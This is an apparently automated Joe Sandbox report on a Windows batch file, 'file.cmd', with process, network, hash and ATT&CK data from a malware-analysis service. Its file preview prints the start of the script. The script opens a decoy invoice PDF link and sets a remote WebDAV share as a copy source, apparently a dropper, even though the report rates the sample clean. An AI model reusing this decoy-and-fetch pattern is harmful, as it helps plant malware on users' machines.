Windows
Analysis Report
file.cmd
Overview
General Information
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 60% |
Signatures
Classification
- System is w10x64
cmd.exe (PID: 7276 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\file. cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7348 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\file.c md" MY_FLA G MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 7360 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) chrome.exe (PID: 7500 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed --sing le-argumen t https:// s2r.tn/cgi /INVOICERV SHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92) chrome.exe (PID: 7696 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2032 --fi eld-trial- handle=199 6,i,147387 2446833510 2062,77543 3884354329 9743,26214 4 --disabl e-features =Optimizat ionGuideMo delDownloa ding,Optim izationHin ts,Optimiz ationHints Fetching,O ptimizatio nTargetPre diction /p refetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
- cleanup
Click to jump to signature section
There are no malicious signatures, click here to show all signatures.
Source: | HTTP Parser: |
Source: | HTTPS traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: | ||
Source: | LNK file: |
Source: | Window detected: |
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior | ||
Source: | File created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 System Information Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 11 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 3 Ingress Tool Transfer | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
s2r.tn | 70.38.21.234 | true | false | unknown | |
www.google.com | 142.250.181.228 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false | unknown | ||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
70.38.21.234 | s2r.tn | Canada | 32613 | IWEB-ASCA | false | |
239.255.255.250 | unknown | Reserved | unknown | unknown | false | |
142.250.181.228 | www.google.com | United States | 15169 | GOOGLEUS | false |
IP |
---|
192.168.2.11 |
192.168.2.9 |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1446784 |
Start date and time: | 2024-05-23 21:06:31 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 15 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | file.cmd |
Detection: | CLEAN |
Classification: | clean3.winCMD@20/10@6/5 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.18.110, 64.233.166.84, 34.104.35.123, 192.229.221.95, 142.250.185.99, 216.58.212.174
- Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
- Not all processes where analyzed, report is missing behavior information
- VT rate limit hit for: file.cmd
Input | Output |
---|---|
URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct | { "loginform": false, "reasons": [ "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.", "The text suggests that the requested URL is not found, which is not related to a login form." ] } |
Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request. |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
70.38.21.234 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | VenomRAT | Browse | |||
Get hash | malicious | XWorm | Browse | |||
Get hash | malicious | XWorm | Browse | |||
Get hash | malicious | Unknown | Browse | |||
239.255.255.250 | Get hash | malicious | GuLoader | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
s2r.tn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | VenomRAT | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | XWorm | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
IWEB-ASCA | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
| ||
Get hash | malicious | AgentTesla, PureLog Stealer | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
1138de370e523e824bbca92d049a3777 | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HtmlDropper, HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | GuLoader | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Phisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2673 |
Entropy (8bit): | 3.9831154024425457 |
Encrypted: | false |
SSDEEP: | 48:8qLdFTEQHcidAKZdA1P4ehwiZUklqehTy+3:8UgvOoy |
MD5: | 3373BE2E65A5B67A6573BD5937B77B02 |
SHA1: | 10A6317F361C80BF6B800215FB3D8A004F9FF01B |
SHA-256: | 2ED6939A3DE110939FE808B497EB8CF8D63ABDD34D7D92144F934034896F3DFE |
SHA-512: | C6D04C838AB32735F8760A937EDA22989FD88F0A6D025035BDE40931BDE9217934F142CEC09FD87A3D76B54C19CBCFDEF75F4AD3925A49B7D733F132C4340CAB |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2675 |
Entropy (8bit): | 3.999383872021734 |
Encrypted: | false |
SSDEEP: | 48:8wdFTEQHcidAKZdA1+4eh/iZUkAQkqehYy+2:8qgeF9Q1y |
MD5: | 0966C44F27807C24CB5D7AD1ADBB9E92 |
SHA1: | E43F284C77E3F1DACAC7A19378164DD0D2D78888 |
SHA-256: | C9B3002A461B1D63F17F0F764CB1507E0CD44A7D6017AB0A398A28DC81AA6CC2 |
SHA-512: | B51028C4EEAA93A2B34F922523B47C576071005B91D130B8CF7ECCDB521ECD92BF7682D04EFFAAF7A3E5037F6E800A5C17CF419D8D15FF5BB5B594229FB88540 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2689 |
Entropy (8bit): | 4.00901776574024 |
Encrypted: | false |
SSDEEP: | 48:8DdFTEVHcidAKZdA1404eh7sFiZUkmgqeh7sSy+BX:83ggInsy |
MD5: | EB02143C37F7F70B20C448A007BB4A93 |
SHA1: | C75EF3213C916B9121B7F67215AFF4B2F1272C1D |
SHA-256: | 99423DBD82D50D6ED46E2A4FB55F1C92ED2648D756B4EC7B337E963215DC4E00 |
SHA-512: | 25AC955B4FA0B00BB14626A274E4B29E13A90702C4A31F8021A8D474356EB1F303F0EC5A907C09E52F37A3345E59394E2A03A93AE2EFB68E8AB2E59FACA4DA6B |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.996620153697733 |
Encrypted: | false |
SSDEEP: | 48:8RdFTEQHcidAKZdA1p4ehDiZUkwqeh0y+R:8JgJ5ay |
MD5: | AA52651BE20AB2F63F0D26F05BE17E8F |
SHA1: | 1F299EA553C056C966F9454D5101C93C1574603A |
SHA-256: | 4DDA56F6B83EB7F4A08800EB43DD3FDE6E5B1C1A43A4EB36F763A7481A6B1E08 |
SHA-512: | 83EC06193B844C0B104BDFA78AD4CDF9DE510B9B86BE1C20CC52B4D4C64657EA6BAB812BD56C279ADAC7846812AC6627AFAC91E988C3C6D6C87D26B2618FF89B |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2677 |
Entropy (8bit): | 3.9867109874874265 |
Encrypted: | false |
SSDEEP: | 48:8MdFTEQHcidAKZdA1X4ehBiZUk1W1qehGy+C:82g3b9my |
MD5: | 831B133CD55443BC9A7053050E34FCE6 |
SHA1: | E586FA379A544890F711ADF5512FBD4AA8C19CF2 |
SHA-256: | 268EFE879B0E423DB7A34196C2C9C7237B729D249CF27683A26AB7631CDED24C |
SHA-512: | 6CE3E119D68895D55311A8E615DCBF9187129A5F7F8E5C08CC8B40DE698440616F77CE0084DE26FE2B0C605223FAD96A94E75823DEF09B2998B944ED95ECB02A |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Download File
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2679 |
Entropy (8bit): | 3.9951662133706987 |
Encrypted: | false |
SSDEEP: | 48:8YdFTEQHcidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbsy+yT+:8ygwTcJTbxWOvTbsy7T |
MD5: | DD2AEA631D7515AFAE23F749A9F762E4 |
SHA1: | D20A29D3F13C72585B983CA9BB6DB3CDCE13ED85 |
SHA-256: | 6712B1A45E3D1AA680D63A9C7C2A7D3B6F778E7DB897BD9196098CBF41C0DA04 |
SHA-512: | 5B6483ECE31AEC130DC1CDB41BA31FC4B695AF7E66D51ABAB69C4BF3A461ECE2629173FC0F374163481D9266B837B8364B967B7A60AC569F8CF73CE93CE0AA44 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 315 |
Entropy (8bit): | 5.0572271090563765 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR |
MD5: | A34AC19F4AFAE63ADC5D2F7BC970C07F |
SHA1: | A82190FC530C265AA40A045C21770D967F4767B8 |
SHA-256: | D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3 |
SHA-512: | 42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765 |
Malicious: | false |
Reputation: | high, very likely benign file |
URL: | https://s2r.tn/favicon.ico |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 315 |
Entropy (8bit): | 5.0572271090563765 |
Encrypted: | false |
SSDEEP: | 6:pn0+Dy9xwGObRmEr6VnetdzRx3G0CezoFEHcLgabzjsKtgsg93wzRbKqD:J0+oxBeRmR9etdzRxGezZfCzjsKtgizR |
MD5: | A34AC19F4AFAE63ADC5D2F7BC970C07F |
SHA1: | A82190FC530C265AA40A045C21770D967F4767B8 |
SHA-256: | D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3 |
SHA-512: | 42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765 |
Malicious: | false |
URL: | https://s2r.tn/cgi/INVOICERVSHA.pdf |
Preview: |
File type: | |
Entropy (8bit): | 5.041379261744134 |
TrID: | |
File name: | file.cmd |
File size: | 1'473 bytes |
MD5: | 21737449c6f74e5e1189d703b6591d0f |
SHA1: | b09e319ed020ba959a1eee66897dfdd17d66b2d0 |
SHA256: | 8604af0ca2b410192af9b078386dceede67ffddc7a467fb4bec39173e69f94bd |
SHA512: | 3cc90489382f076894c911988ce49e20f0f5b3953bc8768cdf4565fa6f26bed905b22950b12ac483ca09ab1ea7d12c13503c6033d247a0702540f7da8886c794 |
SSDEEP: | 24:lHtNBd0zOTSMVgAqKwoxwbXn6omx4nXX6kkx4XHG4x7XmdrRbXpQjQZhQelQHnu/:FBdqXrPox2XZmx4nn3kx43Px72drXQjC |
TLSH: | 4A310C93511D8160A2A67AF6D73C16BFAD1810C5D201390860E6D5FF1637D45A3BBAF8 |
File Content Preview: | @echo off..if "%1" == "" start "" /min "%~f0" MY_FLAG && exit....set source=\\185.29.11.28@9999\DavWWWRoot\google\file..set desusertion=%USERPROFILE%\Pictures....echo Opening PDF file.....start "" "https://s2r.tn/cgi/INVOICERVSHA.pdf"....echo Copying upda |
Icon Hash: | 9686878b929a9886 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 23, 2024 21:07:16.605169058 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:16.620831013 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
May 23, 2024 21:07:17.808320045 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:19.855237961 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:19.855345011 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:20.136506081 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:20.214689970 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:25.027138948 CEST | 49677 | 443 | 192.168.2.9 | 20.189.173.11 |
May 23, 2024 21:07:26.230313063 CEST | 49673 | 443 | 192.168.2.9 | 204.79.197.203 |
May 23, 2024 21:07:29.099370003 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.099410057 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.099611998 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.099972010 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100012064 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.100070000 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100425005 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100435972 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.100568056 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.100579977 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.469408989 CEST | 49676 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.469420910 CEST | 49675 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.628926039 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.629385948 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.629410982 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.630644083 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.630705118 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.631237030 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.653450012 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.653497934 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.654457092 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.654536963 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.654836893 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.655065060 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.655621052 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.655631065 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.656110048 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.656310081 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.705027103 CEST | 49711 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.705028057 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.705044031 CEST | 443 | 49712 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.749233007 CEST | 49674 | 443 | 192.168.2.9 | 23.206.229.209 |
May 23, 2024 21:07:29.749248981 CEST | 49712 | 443 | 192.168.2.9 | 70.38.21.234 |
May 23, 2024 21:07:29.815066099 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
May 23, 2024 21:07:29.815156937 CEST | 443 | 49711 | 70.38.21.234 | 192.168.2.9 |
